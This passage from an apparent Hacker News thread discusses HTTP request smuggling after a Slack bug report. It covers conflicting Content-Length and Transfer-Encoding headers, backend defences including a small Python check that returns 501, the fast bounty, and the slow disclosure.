         | your own nginx, haproxy before 2.0.6 [2], etc), you might be
         | vulnerable
         | 
         | So I think I'm vulnerable because my setup is nginx->customhttp
         | and my customhttp doesn't understand transfer-encoding-chunked
         | (if there is such a request I just return an error).
         | 
          | As far as I understand this problem only arises if both
          | content-length and transfer-encoding are present, in which
          | case content-length will be ignored.
         | 
         | Shouldn't this attack be very easily avoided if nginx just
         | discards the content-length-header in such cases? Why should
         | nginx ever send both to the backend?
        
           | tialaramex wrote:
           | (I'm assuming here that customhttp means you've got hand-
           | rolled code and isn't somebody's terrible name for their
           | product)
           | 
           | If your customhttp isn't smart enough to handle Chunked
           | encoding it might also just always Connection: Close every
           | request or even just act like an HTTP/0.9 server, in which
           | case it isn't vulnerable.
           | 
           | Request Smuggling requires that both the intermediary (for
           | you nginx) and backend (your customhttp) believe it is
           | possible for one TLS connection to contain multiple HTTP
           | requests, they just disagree on where the boundaries are
           | between those requests.
           | 
           | If either of them insists that no, one TLS connection = one
           | HTTP request, that's legal (but has poor performance which
           | may or may not matter to you) and immunises against Request
           | Smuggling.
        
             | jackewiehose wrote:
             | By "customhttp" I meant my hand-rolled (subset of)http-
             | server. It doesn't support chunked encoding because I also
             | control the client-code but it does support "connection
             | keep-alive" for better performance.
             | 
              | I haven't tested it yet but I'm pretty sure it's vulnerable:
             | my server just looks for content-length and if it doesn't
             | find it, it returns an error. So if nginx sends content-
             | length but then continues to send chunked content it should
             | be possible that the next request won't come from nginx but
             | from an attacker (probably not really a problem at the time
             | but nevertheless not the expected behaviour).
             | 
              | My failure was to always expect "valid" HTTP input from
              | nginx, where "valid" meant my limited knowledge of HTTP.
             | 
             | But the question remains: Is there a reason why nginx
             | should send both headers to the backend?
        
               | tialaramex wrote:
               | If you don't implement an encoding you should obey the
                | HTTP/1.1 standard and "return 501 (Not Implemented), and
               | close the connection". In your case even though not
               | implementing chunked encoding is prohibited, this drop
               | through would save you.
               | 
               | Valid means what the standard says it means. What you
               | don't know can hurt you.
               | 
               | However, if modifying your backend code is hard, you can
               | apparently tell nginx that you don't do chunked encoding
               | and it will sort out the 501 on your behalf. I have not
               | tried this and YMMV.
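The rule tialaramex quotes can be sketched as a tiny framing check for a hand-rolled backend like jackewiehose's. The function name and dict-of-headers shape are illustrative, not any real server's API:

```python
# Illustrative framing check for a backend that never implemented
# chunked encoding (names are made up for this sketch).
def framing_decision(headers):
    """headers: dict mapping lower-cased header names to values.

    Returns (status_to_send, connection_disposition); a status of None
    means "no error, handle the request normally".
    """
    if "transfer-encoding" in headers:
        # We can't parse chunked bodies, so answer 501 (Not Implemented)
        # and close the connection, instead of silently falling back to
        # Content-Length -- the exact desync trap described above.
        return 501, "close"
    # No Transfer-Encoding: Content-Length (or no body) is unambiguous.
    return None, "keep-alive"
```

With this, a request carrying both headers never reaches the Content-Length path, so there is nothing for an attacker's leftover bytes to desynchronize.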
        
               | jackewiehose wrote:
                | I completely agree and I'm sure nginx is doing it right by
                | following the specification, but isn't this a bug in the
                | specification? Why should there be a content-length but
                | then a chunked body?
               | 
               | And if this is a bug in the specification, shouldn't
               | nginx fix it to help us backend-fools?
        
       | mcherm wrote:
       | > I did not expect for this finding to go from submit to
       | fix/bounty in a matter of 24 hours.
       | 
       | I didn't expect that either. I am very pleasantly surprised. I
       | hope my own company would do as well as Slack did here, but I am
       | not certain whether we would.
        
       | londons_explore wrote:
       | And the real lesson here is HTTP probably isn't a good protocol
       | between your proxies and your backends, and you should probably
       | use HTTP/3 to fully eliminate this entire class of bug.
        
         | SahAssar wrote:
         | HTTP/2 also works to fix this, right?
        
       | Lex-2008 wrote:
       | Greatly detailed report and impressive resolution speed, indeed,
       | but sadly it fell behind the cracks regarding disclosure.
        
         | andrekorol wrote:
         | What do you mean by "it fell behind the cracks regarding
         | disclosure"?
        
           | harrier wrote:
           | After the issue was resolved the reporter was asked to wait
           | before disclosure. The reporter waited three months before
            | asking about it again. After that there was a response but it
            | took another month to approve the disclosure.
        
             | andrekorol wrote:
             | Oh, now I get it. Thanks for the clarification.
        
       ___________________________________________________________________
       (page generated 2020-03-13 23:00 UTC)